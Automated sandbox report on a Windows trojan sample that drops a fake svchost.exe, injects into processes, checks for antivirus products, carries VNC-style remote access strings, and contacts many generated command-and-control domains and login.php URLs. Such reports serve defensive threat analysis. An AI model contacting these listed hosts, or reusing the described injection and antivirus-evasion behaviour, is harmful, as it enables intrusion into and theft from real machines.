Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1272000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 12C5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1550000Jump to behavior
Source: C:\Windows\apppatch\svchost.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 2_2_026578A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 5_2_013378A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 6_2_013F78A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 8_2_015278A0
Source: C:\Users\user\Desktop\uavINoSIQh.exe File opened: CA HIPS KmxAgent
Source: C:\Users\user\Desktop\uavINoSIQh.exe File opened: Agnitum Outpost firewal \pipe\acsipc_server
Source: C:\Users\user\Desktop\uavINoSIQh.exe File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi
Source: C:\Users\user\Desktop\uavINoSIQh.exe File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
Source: C:\Users\user\Desktop\uavINoSIQh.exe Window found: AVP NULL ____AVP.Root
Source: C:\Windows\apppatch\svchost.exe File opened: CA HIPS KmxAgent
Source: C:\Windows\apppatch\svchost.exe File opened: Agnitum Outpost firewal \pipe\acsipc_server
Source: C:\Windows\apppatch\svchost.exe File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi
Source: C:\Windows\apppatch\svchost.exe File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
Source: C:\Windows\apppatch\svchost.exe Window found: AVP NULL ____AVP.Root
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000000.1726798146.0000000001751000.00000002.00000001.00040000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000000.1728249072.0000000001921000.00000002.00000001.00040000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000000.1738037608.0000000001941000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: uavINoSIQh.exe, uavINoSIQh.exe, 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, uavINoSIQh.exe, 00000000.00000003.1357318901.0000000000597000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1375813400.0000000002500000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000000.1726798146.0000000001751000.00000002.00000001.00040000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000000.1728249072.0000000001921000.00000002.00000001.00040000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000000.1738037608.0000000001941000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: uavINoSIQh.exe, 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, uavINoSIQh.exe, 00000000.00000003.1357318901.0000000000597000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1375813400.0000000002500000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%sMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3T2data.txt\*.*...\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xexplorer.exeShell_TrayWnd
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000000.1726798146.0000000001751000.00000002.00000001.00040000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000000.1728249072.0000000001921000.00000002.00000001.00040000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000000.1738037608.0000000001941000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\uavINoSIQh.exe Code function: 0_2_00414050 cpuid 0_2_00414050
Source: C:\Windows\apppatch\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Users\user\Desktop\uavINoSIQh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\apppatch\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\apppatch\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\8a99a31f\debug_17;Jan;2025_03;54;07.log VolumeInformation
Source: C:\Windows\apppatch\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\8a99a31f\scr.bmp VolumeInformation
Source: C:\Windows\apppatch\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\8a99a31f\sysinfo.log VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\uavINoSIQh.exe Code function: 0_2_00402360 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,0_2_00402360
Source: C:\Users\user\Desktop\uavINoSIQh.exe Code function: 0_2_00403A20 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403A20
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02644B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle,2_2_02644B00
Source: C:\Users\user\Desktop\uavINoSIQh.exe Code function: 0_2_004034C0 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,0_2_004034C0
Source: uavINoSIQh.exe Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality

Source: uavINoSIQh.exe String found in binary or memory: RFB 003.006
Source: svchost.exe String found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe String found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1860005149.00000000011C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1860005149.00000000011C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1873138668.0000000001320000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1873138668.0000000001320000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeString found in binary or memory: RFB 003.006
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02659E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,2_2_02659E40
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02671250 htons,socket,setsockopt,closesocket,bind,listen,2_2_02671250
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02670480 setsockopt,htons,socket,setsockopt,bind,2_2_02670480
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: 5_2_01351250 htons,socket,setsockopt,closesocket,bind,listen,5_2_01351250
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: 5_2_01350480 setsockopt,htons,socket,setsockopt,bind,5_2_01350480
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: 5_2_01339E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,5_2_01339E40
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: 6_2_01411250 htons,socket,setsockopt,closesocket,bind,listen,6_2_01411250
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: 6_2_01410480 setsockopt,htons,socket,setsockopt,bind,6_2_01410480
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: 6_2_013F9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,6_2_013F9E40
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: 8_2_01541250 htons,socket,setsockopt,closesocket,bind,listen,8_2_01541250
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: 8_2_01540480 setsockopt,htons,socket,setsockopt,bind,8_2_01540480
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: 8_2_01529E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,8_2_01529E40
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 22 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | 111 Input Capture | 2 System Time Discovery | 1 Remote Desktop Protocol | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 Create Account | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 11 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | Security Account Manager | 1 System Network Connections Discovery | SMB/Windows Admin Shares | 111 Input Capture | 11 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 11 Access Token Manipulation | 31 Software Packing | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | 2 Clipboard Data | 1 Remote Access Software | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Registry Run Keys / Startup Folder | 613 Process Injection | 1 DLL Side-Loading | LSA Secrets | 143 System Information Discovery | SSH | Keylogging | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | 1 Bootkit | 1 Scheduled Task/Job | 322 Masquerading | Cached Domain Credentials | 1 Query Registry | VNC | GUI Input Capture | 14 Application Layer Protocol | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Registry Run Keys / Startup Folder | 1 Valid Accounts | DCSync | 351 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 151 Virtualization/Sandbox Evasion | Proc Filesystem | 151 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Access Token Manipulation | /etc/passwd and /etc/shadow | 13 Process Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 613 Process Injection | Network Sniffing | 11 Application Window Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Bootkit | Input Capture | 1 System Owner/User Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
[Behavior graph (ID 1553805; sample uavINoSIQh.exe; start date 11/11/2024; architecture WINDOWS; score 100): uavINoSIQh.exe drops and starts C:\Windows\apppatch\svchost.exe; svchost.exe injects into ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe instances and 10 other processes, which start WerFault.exe; contacted hosts include 178.162.203.211 (LEASEWEB-DE-FRA-10DE, Germany) and 75.2.71.199 (AMAZON-02US, United States).]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| uavINoSIQh.exe | 84% | ReversingLabs | Win32.Trojan.Emotet | |
| uavINoSIQh.exe | 100% | Avira | TR/Crypt.XPACK.Gen | |
| uavINoSIQh.exe | 100% | Joe Sandbox ML | | |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                                                                                      unknown
                                                                                                      unknowntrue
                                                                                                        unknown
                                                                                                        gahykeb.com
                                                                                                        unknown
                                                                                                        unknowntrue
                                                                                                          unknown
                                                                                                          purymog.com
                                                                                                          unknown
                                                                                                          unknowntrue
                                                                                                            unknown
                                                                                                            gadyzib.com
                                                                                                            unknown
                                                                                                            unknowntrue
                                                                                                              unknown
                                                                                                              ganyqow.com
                                                                                                              unknown
                                                                                                              unknowntrue
                                                                                                                unknown
                                                                                                                lyxysun.com
                                                                                                                unknown
                                                                                                                unknowntrue
                                                                                                                  unknown
                                                                                                                  puzyjyg.com
                                                                                                                  unknown
                                                                                                                  unknowntrue
                                                                                                                    unknown
                                                                                                                    vopydek.com
                                                                                                                    unknown
                                                                                                                    unknowntrue
                                                                                                                      unknown
                                                                                                                      qexyfuq.com
                                                                                                                      unknown
                                                                                                                      unknowntrue
                                                                                                                        unknown
                                                                                                                        gatykyh.com
                                                                                                                        unknown
                                                                                                                        unknowntrue
                                                                                                                          unknown
                                                                                                                          vocykem.com
                                                                                                                          unknown
                                                                                                                          unknowntrue
                                                                                                                            unknown
                                                                                                                            gahynus.com
                                                                                                                            unknown
                                                                                                                            unknowntrue
                                                                                                                              unknown
                                                                                                                              pumypop.com
                                                                                                                              unknown
                                                                                                                              unknowntrue
                                                                                                                                unknown
                                                                                                                                lyvysur.com
                                                                                                                                unknown
                                                                                                                                unknowntrue
                                                                                                                                  unknown
                                                                                                                                  galypob.com
                                                                                                                                  unknown
                                                                                                                                  unknowntrue
                                                                                                                                    unknown
                                                                                                                                    puzypav.com
                                                                                                                                    unknown
                                                                                                                                    unknowntrue
                                                                                                                                      unknown
                                                                                                                                      gacyqoz.com
                                                                                                                                      unknown
                                                                                                                                      unknowntrue
                                                                                                                                        unknown
                                                                                                                                        lykywid.com
                                                                                                                                        unknown
                                                                                                                                        unknowntrue
                                                                                                                                          unknown
                                                                                                                                          lykytin.com
                                                                                                                                          unknown
                                                                                                                                          unknowntrue
                                                                                                                                            unknown
                                                                                                                                            vofyref.com
                                                                                                                                            unknown
                                                                                                                                            unknowntrue
                                                                                                                                              unknown
                                                                                                                                              qekytig.com
                                                                                                                                              unknown
                                                                                                                                              unknowntrue
                                                                                                                                                unknown
                                                                                                                                                vocyzek.com
                                                                                                                                                unknown
                                                                                                                                                unknowntrue
                                                                                                                                                  unknown
                                                                                                                                                  puvypoq.com
                                                                                                                                                  unknown
                                                                                                                                                  unknowntrue
                                                                                                                                                    unknown
                                                                                                                                                    puvybeg.com
                                                                                                                                                    unknown
                                                                                                                                                    unknowntrue
                                                                                                                                                      unknown
                                                                                                                                                      pupydig.com
                                                                                                                                                      unknown
                                                                                                                                                      unknowntrue
                                                                                                                                                        unknown
                                                                                                                                                        pupyguq.com
                                                                                                                                                        unknown
                                                                                                                                                        unknowntrue
                                                                                                                                                          unknown
                                                                                                                                                          qedyqal.com
                                                                                                                                                          unknown
                                                                                                                                                          unknowntrue
                                                                                                                                                            unknown
                                                                                                                                                            vowymom.com
                                                                                                                                                            unknown
                                                                                                                                                            unknowntrue
                                                                                                                                                              unknown
                                                                                                                                                              purypol.com
                                                                                                                                                              unknown
                                                                                                                                                              unknowntrue
                                                                                                                                                                unknown
                                                                                                                                                                ganypeb.com
                                                                                                                                                                unknown
                                                                                                                                                                unknowntrue
                                                                                                                                                                  unknown
                                                                                                                                                                  vopymit.com
                                                                                                                                                                  unknown
                                                                                                                                                                  unknowntrue
                                                                                                                                                                    unknown
                                                                                                                                                                    vowyguf.com
                                                                                                                                                                    unknown
                                                                                                                                                                    unknowntrue
                                                                                                                                                                      unknown
                                                                                                                                                                      pupytiq.com
                                                                                                                                                                      unknown
                                                                                                                                                                      unknowntrue
                                                                                                                                                                        unknown
                                                                                                                                                                        lymyfoj.com
                                                                                                                                                                        unknown
                                                                                                                                                                        unknowntrue
                                                                                                                                                                          unknown
                                                                                                                                                                          vowyzuf.com
                                                                                                                                                                          unknown
                                                                                                                                                                          unknowntrue
                                                                                                                                                                            unknown
                                                                                                                                                                            gatyruw.com
                                                                                                                                                                            unknown
                                                                                                                                                                            unknowntrue
                                                                                                                                                                              unknown
                                                                                                                                                                              qebynyg.com
                                                                                                                                                                              unknown
                                                                                                                                                                              unknowntrue
                                                                                                                                                                                unknown
                                                                                                                                                                                puzymev.com
                                                                                                                                                                                unknown
                                                                                                                                                                                unknowntrue
                                                                                                                                                                                  unknown
                                                                                                                                                                                  pupymol.com
                                                                                                                                                                                  unknown
                                                                                                                                                                                  unknowntrue
                                                                                                                                                                                    unknown
                                                                                                                                                                                    vojycif.com
                                                                                                                                                                                    unknown
                                                                                                                                                                                    unknowntrue
                                                                                                                                                                                      unknown
                                                                                                                                                                                      qebyvyl.com
                                                                                                                                                                                      unknown
                                                                                                                                                                                      unknowntrue
                                                                                                                                                                                        unknown
                                                                                                                                                                                        lymysan.com
                                                                                                                                                                                        unknown
                                                                                                                                                                                        unknowntrue
                                                                                                                                                                                          unknown
                                                                                                                                                                                          qekynuq.com
                                                                                                                                                                                          unknown
                                                                                                                                                                                          unknowntrue
                                                                                                                                                                                            unknown
                                                                                                                                                                                            puryjil.com
                                                                                                                                                                                            unknown
                                                                                                                                                                                            unknowntrue
                                                                                                                                                                                              unknown
                                                                                                                                                                                              puvytuv.com
                                                                                                                                                                                              unknown
                                                                                                                                                                                              unknowntrue
                                                                                                                                                                                                unknown
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qedyhyl.com/login.phpsvchost.exe, 00000002.00000003.1533901430.0000000008B8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vojyduf.com/login.phpsvchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1809959193.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qedyhiq.com/Hsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://ganydeh.com/login.phpsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gatyqeb.com/Hsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
